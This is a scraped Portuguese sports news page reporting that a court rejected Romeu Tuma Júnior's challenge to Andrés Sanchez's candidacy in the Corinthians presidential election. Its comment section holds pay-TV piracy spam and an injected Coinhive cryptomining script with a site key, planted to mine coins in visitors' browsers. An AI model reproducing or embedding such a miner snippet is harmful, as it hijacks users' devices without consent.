2/2/2018 19:41

Justiça indefere pedido e Andrés se mantém como candidato do Corinthians

Romeu Tuma Júnior havia pedido a impugnação do deputado alegando que ele não tinha condições legais de assumir o cargo, caso fosse eleito

Justiça indefere pedido e Andrés se mantém como candidato do Corinthians
Foto: Hélvio Romero / Estadão

A Justiça indeferiu a ação feita pelo candidato à presidência do Corinthians, Romeu Tuma Júnior, que pediu a impugnação da candidatura de Andrés Sanchez. Com a decisão, Andrés continua tendo o direito a concorrer ao pleito, que acontece no sábado.



Através de sua assessoria de imprensa, Andrés comemorou o resultado. "Confio muito na Justiça do meu país. Aliás, muitas pessoas há muito tempo falam besteiras em muitas questões relacionadas a mim. Sobre esse cidadão que tentou cassar minha candidatura, acredito que temos que deixar para o sócio do Corinthians decidir o que é melhor para o clube. A Justiça precisar perder um tempo precioso com esse tipo de assunto é lamentável. Mais lamentável ainda é que pessoas fiquem tentando prejudicar o Corinthians, ao judicializar as eleições. Amanhã, eu espero o eleitor no clube para que o pleito transcorra normalmente e que a vontade dos votos expressos nas urnas seja o melhor para o Corinthians."

A açãode Tuma foi ingressada na 5ª Vara Cível de Tatuapé. Tuma se baseia no artigo 54 da Constituição, que diz. "Deputados e Senadores não poderão [...] firmar ou manter contrato com pessoa jurídica de direito público, autarquia, empresa pública, sociedade de economia mista ou empresa concessionária de serviço público, salvo quando o contrato obedecer a cláusulas uniformes."

Para o candidato da oposição, o Corinthians poderia ser prejudicado caso Andrés fosse eleito. Tuma alega que Andrés, por ser deputado, não pode dirigir clube que recebe verbas públicas e manter o cargo pública. "O problema do Andrés é que a Arena tem contrato com a Caixa e com o BNDES e ele não pode assumir o cargo. Ele até poderia assumir e continuar como deputado, mas para isso, o clube não poderia ter verba pública", explica Tuma.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Juventude
- Corinthians e Atlético-MG empatam na estreia do Brasileirão
- Timão escalado para o jogo contra o Atlético-MG









2982 visitas - Fonte: Estadão

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

ese

Andrés volta logo para botar ordem na casa. Essa diretoria que estava aí, é muito incompetente, muito ruím mesmo.

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

que bom pra nois

Muito bom

Andres Sanches já ganhou e o novo presidente do corinthians tenho certeza vai fazer muito pelo timao

meu voto é seu andrez rumo a mais uma Vitória.

q bom

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade